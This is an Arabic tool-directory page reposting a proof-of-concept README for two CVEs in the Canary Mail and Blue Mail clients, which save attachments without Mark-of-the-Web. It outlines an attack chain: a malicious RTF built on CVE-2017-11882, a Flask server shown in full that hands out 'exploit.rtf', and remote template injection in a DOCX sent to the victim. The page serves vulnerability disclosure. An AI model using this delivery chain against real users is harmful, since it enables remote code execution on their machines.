Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65318-and-CVE-2025-65319 — معالجة غير آمنة للمرفقات عند استخدام Canary Mail أو Blue Mail | Kitploit
أدوات/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةاختبار الاختراقالتعلم والتعليم
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

معالجة غير آمنة للمرفقات عند استخدام Canary Mail أو Blue Mail

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
7منذ 8 أشهرلم تتم المراجعة بعد

إثبات المفهوم (PoC) لـ CVE-2025-65318 و CVE-2025-65319

  • CVE-2025-65318 (BDU:2025-13740): عند استخدام وظيفة التفاعل مع المرفقات، تقوم Canary Mail الإصدار 5.1.40 وما دون بحفظ المستندات في نظام الملفات بدون وسم Mark-of-the-Web، مما يسمح للمهاجمين بتجاوز آليات حماية الملفات المضمنة في كل من نظام التشغيل Windows وبرامج الطرف الثالث.
  • CVE-2025-65319 (BDU:2025-13739): عند استخدام وظيفة التفاعل مع المرفقات، تقوم Blue Mail الإصدار 1.140.103 وما دون بحفظ المستندات في نظام الملفات بدون وسم Mark-of-the-Web، مما يسمح للمهاجمين بتجاوز آليات حماية الملفات المضمنة في كل من نظام التشغيل Windows وبرامج الطرف الثالث.

نظرة عامة

المشكلة الأساسية ليست في أن المستخدمين يفتحون مرفقات خبيثة، بل في أن تطبيقات مثل Canary Mail أو Blue Mail توفر ميزة مريحة لكنها غير آمنة لحفظ هذه المرفقات أو فتحها. أعتبر هذا ثغرة أمنية تعرّض المستخدمين للمهاجمين.

CWE-693 - فشل آلية الحماية

إثبات المفهوم (PoC)

لتوضيح الفتح غير الآمن لمرفقات Office Word عبر مربع حوار "فتح باستخدام" أو "حفظ باسم"، تم استخدام الثغرة CVE-2017-11882 في محرر المعادلات لإصدارات Office Word 16 والإصدارات الأقدم.

  1. قم بإنشاء كائن RTF خبيث على جهاز المهاجم يفتح الآلة الحاسبة على الجهاز باستخدام السكربت.
  2. قم بنشر خادم لإرسال مستند RTF خبيث باستخدام حقن القالب عن بُعد (Remote Template Injection).
root@kitploit:~
from flask import Flask, send_file, request
import logging
from datetime import datetime

app = Flask(__name__)

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

@app.before_request
def log_request_info():
    logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')

@app.after_request
def log_response_info(response):
    logger.info(f'Response: Status {response.status_code} for {request.url}')
    return response

@app.route('/download')
def download_file():
    try:
        response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
        logger.info('File download successful')
        return response
    except FileNotFoundError:
        logger.error('File exploit.rtf not found')
        return 'File not found', 404

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

  1. أنشئ أي مستند DOCX واستخدم حقن القالب عن بُعد من خلال تشغيل سكربت PowerShell على سبيل المثال.
  2. يرسل المهاجم مستند DOCX الخبيث الناتج إلى الضحية.
  3. يفتح الضحية المستند الخبيث باستخدام وظيفتي "فتح باستخدام" أو "حفظ باسم" في Canary Mail/Blue Mail.
  4. عند فتح مستند خبيث، يمكن اختراق الضحية دون الضغط على أي أزرار إضافية.

التأثير

احتمالية تنفيذ تعليمات برمجية عن بُعد (RCE) للمستخدمين الذين يستخدمون إصدارات قديمة من برنامج Microsoft Office Word الإصدار 16 والإصدارات الأقدم.

الإصدارات المتأثرة

  • Canary Mail الإصدار 5.1.40 وما دون
  • Blue Mail الإصدار 1.140.103 وما دون

فيديو إثبات المفهوم (PoC)

CVE-2025-65318

https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

CVE-2025-65319

https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

المراجع

  • https://bdu.fstec.ru/vul/2025-13739
  • https://bdu.fstec.ru/vul/2025-13740

إخلاء المسؤولية

هذا المستودع مخصص للبحث الأمني التعليمي والدفاعي فقط

تنزيل الأداة